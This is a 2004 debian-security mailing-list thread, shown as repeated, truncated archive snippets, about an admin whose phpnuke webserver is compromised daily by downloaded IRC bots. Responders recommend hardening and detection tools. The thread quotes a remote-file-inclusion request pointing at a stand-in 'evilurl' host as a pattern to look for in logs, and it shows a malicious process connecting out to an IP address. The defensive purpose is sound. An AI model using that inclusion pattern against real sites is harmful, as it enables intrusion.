: Advice needed, trying to find the vulnerable code on Debian
webserver.
On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote:
> Hi all,
>
> I did a search in the logs on some of the suspicious users and found a
> match.
> The files that are being downloaded then execute
On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote:
> Hi all,
>
> I did a search in the logs on some of the suspicious users and found a
> match.
> The files that are being downloaded then executed see to be IRC bots.
> http://www.energymech.net/
>
> Here are some log files.
>
> 193
ny sense.
The site in question is a phpnuke site with lots of modules.
What steps should I take now ?
Thanks very much for everyones help.
--
Ross
-Original Message-
From: Ross Tsolakidis
Sent: Friday, 18 June 2004 9:20 AM
To: debian-security@lists.debian.org
Subject: RE: Advice needed, t
On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote:
> Hi all,
>
> I did a search in the logs on some of the suspicious users and found a
> match.
> The files that are being downloaded then executed see to be IRC bots.
> http://www.energymech.net/
>
> Here are some log files.
>
> 193
ny sense.
The site in question is a phpnuke site with lots of modules.
What steps should I take now ?
Thanks very much for everyones help.
--
Ross
-Original Message-
From: Ross Tsolakidis
Sent: Friday, 18 June 2004 9:20 AM
To: [EMAIL PROTECTED]
Subject: RE: Advice needed, trying to
D]
Cc: Alvin Oga; debian-security@lists.debian.org
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.
On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
> > >
> > > Install some rules for it to harden your webserver, see if
> >
D]
Cc: Alvin Oga; [EMAIL PROTECTED]
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.
On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
> > >
> > > Install some rules for it to harden your webserver, see if
> > > anythin
On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
> > >
> > > Install some rules for it to harden your webserver, see if anything is
> > > flagged in the security log.
> >
> > other web server testing tools
> > http://www.linux-sec.net/Web/#Testing
>
> Has anyone actually used
On Tue, 15 Jun 2004, Alvin Oga wrote:
>
> hi ya
>
> On Wed, 16 Jun 2004, TiM wrote:
>
> >
> > Look at installing mod_security, http://modsecurity.org
> >
> > Install some rules for it to harden your webserver, see if anything is
> > flagged in the security log.
>
> other web server testing
On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
> > >
> > > Install some rules for it to harden your webserver, see if anything is
> > > flagged in the security log.
> >
> > other web server testing tools
> > http://www.linux-sec.net/Web/#Testing
>
> Has anyone actually used
On Tue, 15 Jun 2004, Alvin Oga wrote:
>
> hi ya
>
> On Wed, 16 Jun 2004, TiM wrote:
>
> >
> > Look at installing mod_security, http://modsecurity.org
> >
> > Install some rules for it to harden your webserver, see if anything is
> > flagged in the security log.
>
> other web server testing
Ross Tsolakidis wrote:
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.
I suspect cross site scripting. You should parse your logs and search
for requests like:
GET /~stupiduser/buggy-script.cgi?include=http://www.evilurl/
Ross Tsolakidis wrote:
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.
I suspect cross site scripting. You should parse your logs and search
for requests like:
GET /~stupiduser/buggy-script.cgi?include=http://www.evilurl/
You could also try installing snoopy, which logs all commands executed by
users to auth.log. Then look for unusual commands executed by user
"www-data" if you suspect insecure PHP scripts etc.
Cheers,
Richard
--
__ _
|_) /| Richard Atterer | GnuPG key:
| \/¯| http://atterer.n
On Wed, Jun 16, 2004 at 11:46:05AM +1200, TiM wrote:
>
> Look at installing mod_security, http://modsecurity.org
>
> Install some rules for it to harden your webserver, see if anything is
> flagged in the security log.
Also notice that modsecurity provides a way to easily chroot your Apache
we
You could also try installing snoopy, which logs all commands executed by
users to auth.log. Then look for unusual commands executed by user
"www-data" if you suspect insecure PHP scripts etc.
Cheers,
Richard
--
__ _
|_) /| Richard Atterer | GnuPG key:
| \/¯| http://atterer.n
On Wed, Jun 16, 2004 at 11:46:05AM +1200, TiM wrote:
>
> Look at installing mod_security, http://modsecurity.org
>
> Install some rules for it to harden your webserver, see if anything is
> flagged in the security log.
Also notice that modsecurity provides a way to easily chroot your Apache
we
hi ya
On Wed, 16 Jun 2004, TiM wrote:
>
> Look at installing mod_security, http://modsecurity.org
>
> Install some rules for it to harden your webserver, see if anything is
> flagged in the security log.
other web server testing tools
http://www.linux-sec.net/Web/#Testing
c ya
alvin
Look at installing mod_security, http://modsecurity.org
Install some rules for it to harden your webserver, see if anything is
flagged in the security log.
Ross Tsolakidis wrote:
"Wipe, install, set up chkrootkit and run it often."
I've already done that. There was no rootkit.
"How does
hi ya
On Wed, 16 Jun 2004, TiM wrote:
>
> Look at installing mod_security, http://modsecurity.org
>
> Install some rules for it to harden your webserver, see if anything is
> flagged in the security log.
other web server testing tools
http://www.linux-sec.net/Web/#Testing
c ya
alvin
On Tue, Jun 15, 2004 at 02:32:21PM +1000, Ross Tsolakidis wrote:
> "Wipe, install, set up chkrootkit and run it often."
> I've already done that. There was no rootkit.
>
An alternative to chkrootkit is rkhunter - it's a set of scripts. You
can find the web address on something like freshmeat.ne
need to find the vulnerable code on this box. And I have no idea
where to begin.
I've tried running virus scans, nothing is infected.
--
Ross
-Original Message-
From: s. keeling [mailto:[EMAIL PROTECTED]
Sent: Tuesday, 15 June 2004 2:06 PM
To: debian-security@lists.debian.org
S
Look at installing mod_security, http://modsecurity.org
Install some rules for it to harden your webserver, see if anything is
flagged in the security log.
Ross Tsolakidis wrote:
"Wipe, install, set up chkrootkit and run it often."
I've already done that. There was no rootkit.
"How does phpnuk
On Tue, Jun 15, 2004 at 02:32:21PM +1000, Ross Tsolakidis wrote:
> "Wipe, install, set up chkrootkit and run it often."
> I've already done that. There was no rootkit.
>
An alternative to chkrootkit is rkhunter - it's a set of scripts. You
can find the web address on something like freshmeat.ne
need to find the vulnerable code on this box. And I have no idea
where to begin.
I've tried running virus scans, nothing is infected.
--
Ross
-Original Message-
From: s. keeling [mailto:[EMAIL PROTECTED]
Sent: Tuesday, 15 June 2004 2:06 PM
To: [EMAIL PROTECTED]
Subject: Re: Advice
On Tue, 15 Jun 2004, Ross Tsolakidis wrote:
> I'd appreciate some help on how to stop this from happening.
Run something like aide so you can detect when it goes wrong (though there
are some caveats it does not sound like they will hit you) and run a
netflow-collector next to it, if you can. Tha
On Tue, 15 Jun 2004, Ross Tsolakidis wrote:
> I'd appreciate some help on how to stop this from happening.
Run something like aide so you can detect when it goes wrong (though there
are some caveats it does not sound like they will hit you) and run a
netflow-collector next to it, if you can. Tha
Incoming from Ross Tsolakidis:
>
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.
>
> 18687 ?S 0:00 shell
> 18701 ?Z 0:00 [sh ]
> 18704 ?T 0:00 ./3 200.177.162.185 1524
I vaguely reme
Incoming from Ross Tsolakidis:
>
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.
>
> 18687 ?S 0:00 shell
> 18701 ?Z 0:00 [sh ]
> 18704 ?T 0:00 ./3 200.177.162.185 1524
I vaguely reme
29 matches
Mail list logo
